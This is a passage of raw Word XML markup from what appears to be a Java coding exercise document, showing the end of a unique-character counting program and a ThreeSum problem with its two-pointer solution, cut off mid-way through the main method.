    <w:p w14:paraId="3EF06321" w14:textId="67F3661D" w:rsidR="008240D3" w:rsidRPr="00CE4B95" w:rsidRDefault="008240D3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22ACD78A"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BD586F3"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29A6EC80"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03CBA446"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UniqueCharacterCou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669C6A1"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12F5E6FB"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EAAF283"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t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Siddhant Patni"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F2688CB"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045AC1AB"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e a map to store frequency of each character</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28C48295"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Charac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frequency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p>
    <w:p w14:paraId="15D25038"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405C2FC3"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terate through each character of the string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BA12741"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char</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> c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t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CharArr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06BB32A"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gnore spaces, and if character is not space, add to map</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EC54833"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c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16F7C43"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00"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                frequency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requency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OrDefaul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7CFEBE7F"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3DF1C20"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146D98F"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00"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="061505F0"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ount unique characters (those with frequency 1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F918A7F"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long</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> uniqueCou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requency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value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p>
    <w:p w14:paraId="3D7B20D3"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il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count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cou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37A70DB4"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unt</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EC57E12"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19823D8D"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int the result</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="348008DD"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Count of unique characters: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uniqueCount</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EE0DA6E" w14:textId="77777777"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4D4B64F" w14:textId="440BF746" w:rsidR="000A1110" w:rsidRPr="00CE4B95"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129C2A36" w14:textId="77777777" w:rsidR="00940E24" w:rsidRPr="00CE4B95" w:rsidRDefault="00940E24" w:rsidP="00940E24">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A62EE14" w14:textId="1E649E25" w:rsidR="005A767B" w:rsidRPr="00CE4B95" w:rsidRDefault="005A767B">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="368" w:name="_Toc196307848"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">Program – </w:t>
      </w:r>
      <w:r w:rsidR="00154622" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>ThreeSum</w:t>
      </w:r>
      <w:bookmarkEnd w:id="368"/>
    </w:p>
    <w:p w14:paraId="451EB025" w14:textId="77777777" w:rsidR="0040341D" w:rsidRPr="00CE4B95" w:rsidRDefault="005A767B" w:rsidP="0040341D">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Problem Definition: </w:t>
      </w:r>
      <w:r w:rsidR="0040341D" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Given an integer array nums, return all the triplets [nums[i], nums[j], nums[k]] such that:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1203F159" w14:textId="5D8219AC" w:rsidR="0040341D" w:rsidRPr="00CE4B95" w:rsidRDefault="0040341D" w:rsidP="0040341D">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:tab/>
        <w:t>i, j, and k are distinct indices, nums[i] + nums[j] + nums[k] == 0.  The solution set must not contain duplicate triplets. Input: nums = [-1,0,1,2,-1,-4]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C4E8CFE" w14:textId="631FC582" w:rsidR="0040341D" w:rsidRPr="00CE4B95" w:rsidRDefault="0040341D" w:rsidP="0040341D">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">       Output: [ [-1,-1,2], [-1,0,1] ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C83C5D0" w14:textId="7EAE4BE3" w:rsidR="0040341D" w:rsidRPr="00CE4B95" w:rsidRDefault="0040341D" w:rsidP="0040341D">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>What is Time complexity and Space complexity?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="505457C2" w14:textId="7FA24BC1" w:rsidR="005A767B" w:rsidRPr="00CE4B95" w:rsidRDefault="0040341D" w:rsidP="0040341D">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>How can you optimize the time complexity?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB79195" w14:textId="640F0F78" w:rsidR="005A767B" w:rsidRPr="00CE4B95" w:rsidRDefault="005A767B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10B9F878"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88"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>import</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> java</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util</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.*;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="497DC8DE"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="798FCC1B"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clas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ThreeSum</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1C961163"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4425B3E5"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List</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>List</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Integer</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>&gt;&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> threeSu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in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num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7573231E"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List</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>List</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Integer</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>&gt;&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> result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ArrayList</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D172850"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5C726CFD"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Array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sor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num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Sorting the array to apply two-pointer technique</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CCBFD47"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28C05EB1"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for</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int</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> i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0</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i </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> num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length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2</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i</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76FD743B"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Skip duplicate elements for the first number</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7460E3A8"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f</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i </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>&g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0</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amp;&amp;</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> num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i</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num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i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1</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440A9759"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continue</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="655CF9C9"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3AE786A9"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F25D7C9"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t</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> left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i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1</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Start of the second pointer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49D4246B"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t</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> right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num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length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1</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Start of the third pointer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A85F403"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2FEEFA72"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whil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left </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> righ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7E0ABBB4"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t</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> sum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num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i</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num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lef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num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right</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CCFF5DA"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p>
    <w:p w14:paraId="5117AA00"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f</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sum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0</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13E19AF1"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result</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add</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Array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asLis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num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i</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num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lef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num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right</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>]));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5101DA54"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Skip duplicates for the second pointer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F21ACFE"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whil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left </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> right </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>&amp;&amp;</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> num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lef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num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left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1</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59F67C5D"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left</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>++;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="600DF1CC"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1201FC2C"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Skip duplicates for the third pointer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7133EE63"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whil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left </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> right </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>&amp;&amp;</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> num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righ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num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right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1</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704D33F6"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right</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>--;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CCF6910"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1BFE7F07"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Move both pointers after finding a valid triplet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D5BFED2"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left</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>++;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D4B7883"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right</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>--;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="735AF23C"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els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f</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sum </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>&l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0</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030BCDEE"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lef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Need a larger sum, so move left pointer to the right</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76E7C6C0"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els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34C0A2CC"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righ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880000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>// Need a smaller sum, so move right pointer to the left</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D323E01"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6B819AA8"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66170741"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1C7E3BEE"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return</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> result</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31CDE1D8"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425DE0C7"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26850CCF"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publ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static</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void</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> main</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>String</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args</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594924DC"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ThreeSum</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
